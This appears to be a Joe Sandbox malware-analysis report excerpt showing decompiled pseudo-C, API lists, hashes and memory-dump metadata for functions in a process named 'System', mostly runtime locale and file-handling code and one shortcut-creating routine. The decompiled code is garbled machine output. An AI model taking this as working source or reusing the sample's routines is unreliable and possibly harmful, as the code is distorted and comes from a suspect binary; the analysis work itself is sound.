                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 1502251526-2286445522
                                                                                                                                                              • Opcode ID: c2ee569de5f356e59da070649411a601e58e156313a0400235f5276fe1b68095
                                                                                                                                                              • Instruction ID: 19faa0996502cffb70488204b08e7dfa4a68eb9960136caabdd1142fedcd382c
                                                                                                                                                              • Opcode Fuzzy Hash: c2ee569de5f356e59da070649411a601e58e156313a0400235f5276fe1b68095
                                                                                                                                                              • Instruction Fuzzy Hash: 70C1C476B6828687DB24CF29A084779B7A1FB94F84F05D136DB4A83744DE3EE801CB44
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6E204 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 208COMMONLIBRARYCODECrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00007FF67FF6E4C6E204(long long __rbx, intOrPtr* __rcx, long long __rsi, intOrPtr _a16, long long _a24, long long _a32) {
				void* _v40;
				long long _v72;
				intOrPtr* _t20;

				_a24 = __rbx;
				_a32 = __rsi;
				_t20 =  *((intOrPtr*)(__rcx));
				r14d =  *_t20;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 8)))) != 0) goto 0xe4c6e244;
				E00007FF67FF6E4C73764(r14d, _t20, 0);
				goto 0xe4c6e2ec;
				_v72 = 0x7fffffff;
				r8d = 0;
				E00007FF67FF6E4C7C1C8();
				if (_t20 == 0x16) goto 0xe4c6e476;
				if (_t20 == 0x22) goto 0xe4c6e476;
				 *((intOrPtr*)(__rbx)) =  *((intOrPtr*)(__rbx)) + sil;
				if (_t20 != 0) goto 0xe4c6e2a6;
				return E00007FF67FF6E4C76B28(_t20, _a16);
			}






                                                                                                                                                              0x7ff6e4c6e204
                                                                                                                                                              0x7ff6e4c6e209
                                                                                                                                                              0x7ff6e4c6e229
                                                                                                                                                              0x7ff6e4c6e22c
                                                                                                                                                              0x7ff6e4c6e232
                                                                                                                                                              0x7ff6e4c6e237
                                                                                                                                                              0x7ff6e4c6e23f
                                                                                                                                                              0x7ff6e4c6e247
                                                                                                                                                              0x7ff6e4c6e250
                                                                                                                                                              0x7ff6e4c6e257
                                                                                                                                                              0x7ff6e4c6e25f
                                                                                                                                                              0x7ff6e4c6e268
                                                                                                                                                              0x7ff6e4c6e27b
                                                                                                                                                              0x7ff6e4c6e284
                                                                                                                                                              0x7ff6e4c6e2a5

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Wcsftime$_invalid_parameter_noinfo
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 4239037671-2286445522
                                                                                                                                                              • Opcode ID: 1a39414b815c93a1f073e71fb9693831ae882eb5726b83c62f11ff2b9dfc3521
                                                                                                                                                              • Instruction ID: 6a4ba214efc7574ab0e6a204d2cfbf8a5aad55885aa8b29b9caa267f775e6362
                                                                                                                                                              • Opcode Fuzzy Hash: 1a39414b815c93a1f073e71fb9693831ae882eb5726b83c62f11ff2b9dfc3521
                                                                                                                                                              • Instruction Fuzzy Hash: 4681AE37A18A5286EB608E79C4C537927B1FB44FA8F158637EE1E87788CF3AD0418345
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocaletry_get_function
                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                              • API String ID: 2200034068-2904428671
                                                                                                                                                              • Opcode ID: c3d2d2281e7a5844e2be236c03ab4ab0afdc762f09fbde5c79f185710fb1d0a7
                                                                                                                                                              • Instruction ID: cae2379da5ebea039a2139a19508e726da85c95ecb40045d3309adae2320ed84
                                                                                                                                                              • Opcode Fuzzy Hash: c3d2d2281e7a5844e2be236c03ab4ab0afdc762f09fbde5c79f185710fb1d0a7
                                                                                                                                                              • Instruction Fuzzy Hash: 7301842BB4D64282E7009B31B4845AAA770AF88FC4F584037DA0D43B95CE3DE541C345
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77F28 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E00007FF67FF6E4C77F28(void* __edi, void* __esp, void* __eflags, void* __rcx, long long __rdi, long long _a8) {
				void* _v4;
				int _t29;
				signed int _t32;
				intOrPtr* _t41;
				void* _t44;
				void* _t65;

				E00007FF67FF6E4C776B4(_t32, _t44, "AreFileApisANSI", _t65, 0xe4c97d08, 0xe4c97d0c);
				asm("std");
				 *_t41 =  *_t41 + _t41;
				E00007FF67FF6E4C776B4(_t32, _t44, "CompareStringEx", _t65, 0xe4c97d08, "CompareStringEx");
				asm("std");
				 *_t41 =  *_t41 + _t41;
				_t61 = "EnumSystemLocalesEx";
				E00007FF67FF6E4C776B4(_t32, _t44, "EnumSystemLocalesEx", _t65, 0xe4c97d08, "EnumSystemLocalesEx");
				 *0x8 =  *0x8 + 1;
				 *((intOrPtr*)(_t41 - 0x73)) =  *((intOrPtr*)(_t41 - 0x73)) + _t32;
				asm("adc eax, 0x1fe18");
				E00007FF67FF6E4C776B4(_t32, _t44, "EnumSystemLocalesEx", _t65, 0xe4c97d08, "GetDateFormatEx");
				 *0xb =  *0xb + 1;
				 *((intOrPtr*)(_t41 - 0x73)) =  *((intOrPtr*)(_t41 - 0x73)) + _t32;
				asm("adc eax, 0x1fe11");
				E00007FF67FF6E4C776B4(_t32, _t44, _t61, _t65, 0xe4c97d08, "GetLocaleInfoEx");
				 *0xe =  *0xe + 1;
				 *((intOrPtr*)(_t41 - 0x73)) =  *((intOrPtr*)(_t41 - 0x73)) + _t32;
				asm("adc eax, 0x1fe0a");
				E00007FF67FF6E4C776B4(_t32, _t44, _t61, _t65, 0xe4c97d08, "GetTimeFormatEx");
				 *0xf =  *0xf + 1;
				 *((intOrPtr*)(_t41 - 0x73)) =  *((intOrPtr*)(_t41 - 0x73)) + _t32;
				asm("adc eax, 0x1fe03");
				E00007FF67FF6E4C776B4(_t32, _t44, _t61, _t65, 0xe4c97d08, "GetUserDefaultLocaleName");
				 *0x13 =  *0x13 + 1;
				 *((intOrPtr*)(_t41 - 0x73)) =  *((intOrPtr*)(_t41 - 0x73)) + _t32;
				asm("adc eax, 0x1fe34");
				E00007FF67FF6E4C776B4(_t32, _t44, _t61, _t65, 0xe4c97d08, "IsValidLocaleName");
				 *0x14 =  *0x14 + 1;
				 *((intOrPtr*)(_t41 - 0x73)) =  *((intOrPtr*)(_t41 - 0x73)) + _t32;
				asm("adc eax, 0x1fe35");
				E00007FF67FF6E4C776B4(_t32, _t44, _t61, _t65, 0xe4c97d08, "LCMapStringEx");
				 *0x15 =  *0x15 + 1;
				 *((intOrPtr*)(_t41 - 0x73)) =  *((intOrPtr*)(_t41 - 0x73)) + _t32;
				asm("adc eax, 0x1fe2e");
				_t29 = E00007FF67FF6E4C776B4(_t32, _t44, _t61, _t65, 0xe4c97d08, "LCIDToLocaleName");
				 *0x16 =  *0x16 + 1;
				 *((intOrPtr*)(_t41 - 0x73)) =  *((intOrPtr*)(_t41 - 0x73)) + _t32;
				asm("adc eax, 0x1fe2f");
				goto E00007FF67FF6E4C776B4;
				asm("int3");
				asm("int3");
				_a8 = __rdi;
				asm("dec eax");
				memset(__edi, _t29, _t32 << 0);
				return 1;
			}









                                                                                                                                                              0x7ff6e4c77f43
                                                                                                                                                              0x7ff6e4c77f58
                                                                                                                                                              0x7ff6e4c77f59
                                                                                                                                                              0x7ff6e4c77f62
                                                                                                                                                              0x7ff6e4c77f77
                                                                                                                                                              0x7ff6e4c77f78
                                                                                                                                                              0x7ff6e4c77f7a
                                                                                                                                                              0x7ff6e4c77f81
                                                                                                                                                              0x7ff6e4c77f96
                                                                                                                                                              0x7ff6e4c77f98
                                                                                                                                                              0x7ff6e4c77f9b
                                                                                                                                                              0x7ff6e4c77fa0
                                                                                                                                                              0x7ff6e4c77fb5
                                                                                                                                                              0x7ff6e4c77fb7
                                                                                                                                                              0x7ff6e4c77fba
                                                                                                                                                              0x7ff6e4c77fbf
                                                                                                                                                              0x7ff6e4c77fd4
                                                                                                                                                              0x7ff6e4c77fd6
                                                                                                                                                              0x7ff6e4c77fd9
                                                                                                                                                              0x7ff6e4c77fde
                                                                                                                                                              0x7ff6e4c77ff3
                                                                                                                                                              0x7ff6e4c77ff5
                                                                                                                                                              0x7ff6e4c77ff8
                                                                                                                                                              0x7ff6e4c77ffd
                                                                                                                                                              0x7ff6e4c78012
                                                                                                                                                              0x7ff6e4c78014
                                                                                                                                                              0x7ff6e4c78017
                                                                                                                                                              0x7ff6e4c7801c
                                                                                                                                                              0x7ff6e4c78031
                                                                                                                                                              0x7ff6e4c78033
                                                                                                                                                              0x7ff6e4c78036
                                                                                                                                                              0x7ff6e4c7803b
                                                                                                                                                              0x7ff6e4c78050
                                                                                                                                                              0x7ff6e4c78052
                                                                                                                                                              0x7ff6e4c78055
                                                                                                                                                              0x7ff6e4c7805a
                                                                                                                                                              0x7ff6e4c7806f
                                                                                                                                                              0x7ff6e4c78071
                                                                                                                                                              0x7ff6e4c78074
                                                                                                                                                              0x7ff6e4c7807d
                                                                                                                                                              0x7ff6e4c78082
                                                                                                                                                              0x7ff6e4c78083
                                                                                                                                                              0x7ff6e4c78084
                                                                                                                                                              0x7ff6e4c780a1
                                                                                                                                                              0x7ff6e4c780aa
                                                                                                                                                              0x7ff6e4c780b4

                                                                                                                                                              APIs
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77F43
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77F62
                                                                                                                                                                • Part of subcall function 00007FF6E4C776B4: GetProcAddress.KERNEL32(?,?,0000000100000006,00007FF6E4C77B92,?,?,8000000000000000,00007FF6E4C75C8A,?,?,8000000000000000,00007FF6E4C6C85D), ref: 00007FF6E4C7780C
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77F81
                                                                                                                                                                • Part of subcall function 00007FF6E4C776B4: LoadLibraryExW.KERNEL32(?,?,0000000100000006,00007FF6E4C77B92,?,?,8000000000000000,00007FF6E4C75C8A,?,?,8000000000000000,00007FF6E4C6C85D), ref: 00007FF6E4C77757
                                                                                                                                                                • Part of subcall function 00007FF6E4C776B4: GetLastError.KERNEL32(?,?,0000000100000006,00007FF6E4C77B92,?,?,8000000000000000,00007FF6E4C75C8A,?,?,8000000000000000,00007FF6E4C6C85D), ref: 00007FF6E4C77765
                                                                                                                                                                • Part of subcall function 00007FF6E4C776B4: LoadLibraryExW.KERNEL32(?,?,0000000100000006,00007FF6E4C77B92,?,?,8000000000000000,00007FF6E4C75C8A,?,?,8000000000000000,00007FF6E4C6C85D), ref: 00007FF6E4C777A7
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77FA0
                                                                                                                                                                • Part of subcall function 00007FF6E4C776B4: FreeLibrary.KERNEL32(?,?,0000000100000006,00007FF6E4C77B92,?,?,8000000000000000,00007FF6E4C75C8A,?,?,8000000000000000,00007FF6E4C6C85D), ref: 00007FF6E4C777E0
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77FBF
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77FDE
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C77FFD
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C7801C
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C7803B
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6E4C7805A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                              • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                              • API String ID: 3255926029-3252031757
                                                                                                                                                              • Opcode ID: 60d8d2b8b26db01f9a645cd0b99cb1464284d4e4dfa43632ebe28b79fd046266
                                                                                                                                                              • Instruction ID: 9c815aa5cba2ac379e19283df09b5cd4d6a369b80953495cb717b070a67f273c
                                                                                                                                                              • Opcode Fuzzy Hash: 60d8d2b8b26db01f9a645cd0b99cb1464284d4e4dfa43632ebe28b79fd046266
                                                                                                                                                              • Instruction Fuzzy Hash: C531756B98B54BF5EA049B74E8C47F42331AF45B08F841073D20D831B59E7FAA89C35A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C46EB0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 137filestringcomCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleResource$FileModule$Createlstrlen$CloseDeleteFindFolderInitializeInstanceLoadLockPathSizeofSpecialWritelstrcat
                                                                                                                                                              • String ID: exe.ico$link description
                                                                                                                                                              • API String ID: 3781226362-2435803949
                                                                                                                                                              • Opcode ID: 42cd4e9ff59423e0887c436279751804f91f5351364618a351cf5bf527f59c97
                                                                                                                                                              • Instruction ID: f8e7a60898d9b6df6aa9265eada5d7f0f6f0514162e777d7dd97f8e423db8617
                                                                                                                                                              • Opcode Fuzzy Hash: 42cd4e9ff59423e0887c436279751804f91f5351364618a351cf5bf527f59c97
                                                                                                                                                              • Instruction Fuzzy Hash: 3F512C2A749A4782EB508B36E49436963B0FB88F85F544136CE4E83764DF3EE449C706
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C609D4 Relevance: 22.7, APIs: 15, Instructions: 205COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$AttributesErrorFileLast__std_fs_open_handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1051874144-0
                                                                                                                                                              • Opcode ID: e6a1a0f42d099e5c99db31b703860c5bef2024190bd97f155d2e966e7b316c7a
                                                                                                                                                              • Instruction ID: be5c157c695bb4c7389b5dc307bc776f3567e5d73af81eefa01ed54a18943883
                                                                                                                                                              • Opcode Fuzzy Hash: e6a1a0f42d099e5c99db31b703860c5bef2024190bd97f155d2e966e7b316c7a
                                                                                                                                                              • Instruction Fuzzy Hash: D381823BBA960385E664CB36988037922B0AF45F64F148376D92EE76D1DF3AE405C306
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C43430 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                              			E00007FF67FF6E4C43430(long long __rbx, long long __rcx, void* __rdx, long long __rsi, intOrPtr* __r8, intOrPtr* __r9) {
				void* __rdi;
				void* __rbp;
				void* __r12;
				void* __r14;
				void* __r15;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t85;
				signed long long _t102;
				intOrPtr* _t106;
				intOrPtr _t109;
				intOrPtr* _t123;
				intOrPtr* _t133;
				intOrPtr _t142;
				void* _t158;
				void* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				intOrPtr _t166;
				void* _t169;
				intOrPtr* _t177;
				long long _t179;
				void* _t181;
				void* _t182;
				void* _t184;
				long long _t196;
				void* _t198;
				void* _t200;
				void* _t201;

				 *((long long*)(_t184 + 0x18)) = __rbx;
				 *((long long*)(_t184 + 0x20)) = __rsi;
				_t182 = _t184 - 0x37;
				_t102 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t182 + 0x27) = _t102 ^ _t184 - 0x00000090;
				_t177 = __r9;
				_t201 = __rdx;
				_t123 = __rcx;
				 *((long long*)(_t182 - 0x21)) = __rcx;
				r12d = 0;
				 *((intOrPtr*)(_t182 - 0x29)) = r12d;
				 *((long long*)(__rcx)) = _t196;
				 *((long long*)(__rcx + 0x10)) = _t196;
				 *((long long*)(__rcx + 0x18)) = 0xf;
				 *((intOrPtr*)(__rcx)) = r12b;
				 *((long long*)(_t182 - 0x29)) = 1;
				r14d = E00007FF67FF6E4C607B0();
				if ( *((long long*)(__r8 + 0x18)) - 8 < 0) goto 0xe4c434a2;
				_t171 =  *((intOrPtr*)(__r8));
				 *((long long*)(_t182 - 0x39)) =  *((intOrPtr*)(__r8));
				 *((long long*)(_t182 - 0x31)) =  *((intOrPtr*)(__r8 + 0x10));
				asm("movaps xmm0, [ebp-0x39]");
				asm("movdqa [ebp-0x39], xmm0");
				E00007FF67FF6E4C4B380(_t75, r14d,  *((intOrPtr*)(__r8 + 0x10)), __rcx, _t182 + 7, _t182, _t182 - 0x39);
				_t106 =  *((intOrPtr*)(_t177 + 0x10));
				if ( *((long long*)(_t177 + 0x18)) - 8 < 0) goto 0xe4c434d2;
				 *((long long*)(_t182 - 0x39)) =  *_t177;
				 *((long long*)(_t182 - 0x31)) = _t106;
				asm("movaps xmm0, [ebp-0x39]");
				asm("movdqa [ebp-0x39], xmm0");
				 *_t106 =  *_t106 + E00007FF67FF6E4C4B380(_t75, r14d, _t106, _t123, _t182 - 0x19, _t182, _t182 - 0x39);
				_t77 =  ==  ? r14d : _t76;
				_t179 =  *((intOrPtr*)(_t123 + 0x10));
				if (_t179 - 0x8 > 0) goto 0xe4c43597;
				_t109 =  *((intOrPtr*)(_t123 + 0x18));
				_t85 = _t109 - 0x8;
				if (_t85 == 0) goto 0xe4c43597;
				if (_t85 >= 0) goto 0xe4c4353d;
				_t133 = _t123;
				E00007FF67FF6E4C4C600(_t133, 0x8 +  *((intOrPtr*)(_t201 + 8)) +  *((intOrPtr*)(_t182 - 9)) +  *((intOrPtr*)(_t182 + 0x17)) - _t179, _t171, _t201);
				 *((long long*)(_t123 + 0x10)) = _t179;
				goto 0xe4c43597;
				if (_t133 - 0x10 >= 0) goto 0xe4c43597;
				if (_t109 - 0x10 < 0) goto 0xe4c43597;
				_t172 =  *_t123;
				E00007FF67FF6E4C64380();
				if ( *((intOrPtr*)(_t123 + 0x18)) + 1 - 0x1000 < 0) goto 0xe4c43587;
				if ( *_t123 -  *((intOrPtr*)(_t172 - 8)) - 8 - 0x1f > 0) goto 0xe4c43707;
				0xe4c623d0();
				 *((long long*)(_t123 + 0x18)) = 0xf;
				asm("inc ecx");
				asm("movdqa xmm0, xmm1");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				asm("dec ax");
				E00007FF67FF6E4C4AB00(_t123, _t123, _t179, _t179 + 1, _t200);
				r8d = 3;
				E00007FF67FF6E4C4AB00(_t123, _t123, _t179, _t179 + 1, _t198);
				_t158 =  >=  ?  *((void*)(_t182 + 7)) : _t182 + 7;
				E00007FF67FF6E4C4AB00(_t123, _t123, _t179,  *((intOrPtr*)(_t182 + 0x17)), _t196);
				if ( *((long long*)(_t182 - 9)) == 0) goto 0xe4c43618;
				E00007FF67FF6E4C4AB00(_t123, _t123, _t179, _t198, _t169);
				_t161 =  >=  ?  *((void*)(_t182 - 0x19)) : _t182 - 0x19;
				E00007FF67FF6E4C4AB00(_t123, _t123, _t179,  *((intOrPtr*)(_t182 - 9)), _t181);
				_t142 =  *((intOrPtr*)(_t123 + 0x10));
				_t162 =  *((intOrPtr*)(_t123 + 0x18));
				if (_t142 - _t162 >= 0) goto 0xe4c43641;
				 *((long long*)(_t123 + 0x10)) = _t142 + 1;
				if (_t162 - 0x10 < 0) goto 0xe4c43639;
				 *((short*)( *_t123 + _t142)) = 0x22;
				goto 0xe4c43654;
				r9b = 0x22;
				r8d = 0;
				_t73 = E00007FF67FF6E4C4C910(_t123, _t162,  *((intOrPtr*)(_t172 - 8)), _t196, _t198);
				_t163 =  *((intOrPtr*)(_t182 - 1));
				if (_t163 - 0x10 < 0) goto 0xe4c4368f;
				if (_t163 + 1 - 0x1000 < 0) goto 0xe4c4368a;
				if ( *((intOrPtr*)(_t182 - 0x19)) -  *((intOrPtr*)( *((intOrPtr*)(_t182 - 0x19)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4370d;
				0xe4c623d0();
				 *((long long*)(_t182 - 9)) = _t196;
				 *((long long*)(_t182 - 1)) = 0xf;
				 *((char*)(_t182 - 0x19)) = 0;
				_t166 =  *((intOrPtr*)(_t182 + 0x1f));
				if (_t166 - 0x10 < 0) goto 0xe4c436d6;
				if (_t166 + 1 - 0x1000 < 0) goto 0xe4c436d1;
				if ( *((intOrPtr*)(_t182 + 7)) -  *((intOrPtr*)( *((intOrPtr*)(_t182 + 7)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c43701;
				0xe4c623d0();
				return E00007FF67FF6E4C623B0(_t73,  ==  ? r14d : _t76,  *(_t182 + 0x27) ^ _t184 - 0x00000090);
			}

































                                                                                                                                                              0x7ff6e4c43430
                                                                                                                                                              0x7ff6e4c43435
                                                                                                                                                              0x7ff6e4c43442
                                                                                                                                                              0x7ff6e4c4344e
                                                                                                                                                              0x7ff6e4c43458
                                                                                                                                                              0x7ff6e4c4345c
                                                                                                                                                              0x7ff6e4c43462
                                                                                                                                                              0x7ff6e4c43465
                                                                                                                                                              0x7ff6e4c43468
                                                                                                                                                              0x7ff6e4c4346c
                                                                                                                                                              0x7ff6e4c4346f
                                                                                                                                                              0x7ff6e4c43473
                                                                                                                                                              0x7ff6e4c43476
                                                                                                                                                              0x7ff6e4c4347a
                                                                                                                                                              0x7ff6e4c43482
                                                                                                                                                              0x7ff6e4c43485
                                                                                                                                                              0x7ff6e4c43491
                                                                                                                                                              0x7ff6e4c4349d
                                                                                                                                                              0x7ff6e4c4349f
                                                                                                                                                              0x7ff6e4c434a2
                                                                                                                                                              0x7ff6e4c434a6
                                                                                                                                                              0x7ff6e4c434aa
                                                                                                                                                              0x7ff6e4c434ae
                                                                                                                                                              0x7ff6e4c434be
                                                                                                                                                              0x7ff6e4c434c4
                                                                                                                                                              0x7ff6e4c434cd
                                                                                                                                                              0x7ff6e4c434d2
                                                                                                                                                              0x7ff6e4c434d6
                                                                                                                                                              0x7ff6e4c434da
                                                                                                                                                              0x7ff6e4c434de
                                                                                                                                                              0x7ff6e4c434fd
                                                                                                                                                              0x7ff6e4c43506
                                                                                                                                                              0x7ff6e4c43515
                                                                                                                                                              0x7ff6e4c4351c
                                                                                                                                                              0x7ff6e4c4351e
                                                                                                                                                              0x7ff6e4c43522
                                                                                                                                                              0x7ff6e4c43525
                                                                                                                                                              0x7ff6e4c43527
                                                                                                                                                              0x7ff6e4c4352f
                                                                                                                                                              0x7ff6e4c43532
                                                                                                                                                              0x7ff6e4c43537
                                                                                                                                                              0x7ff6e4c4353b
                                                                                                                                                              0x7ff6e4c43541
                                                                                                                                                              0x7ff6e4c43547
                                                                                                                                                              0x7ff6e4c43549
                                                                                                                                                              0x7ff6e4c43556
                                                                                                                                                              0x7ff6e4c43569
                                                                                                                                                              0x7ff6e4c4357e
                                                                                                                                                              0x7ff6e4c4358a
                                                                                                                                                              0x7ff6e4c4358f
                                                                                                                                                              0x7ff6e4c43597
                                                                                                                                                              0x7ff6e4c4359b
                                                                                                                                                              0x7ff6e4c4359f
                                                                                                                                                              0x7ff6e4c435a4
                                                                                                                                                              0x7ff6e4c435a9
                                                                                                                                                              0x7ff6e4c435b1
                                                                                                                                                              0x7ff6e4c435b6
                                                                                                                                                              0x7ff6e4c435c6
                                                                                                                                                              0x7ff6e4c435d4
                                                                                                                                                              0x7ff6e4c435e0
                                                                                                                                                              0x7ff6e4c435ea
                                                                                                                                                              0x7ff6e4c435f9
                                                                                                                                                              0x7ff6e4c43607
                                                                                                                                                              0x7ff6e4c43613
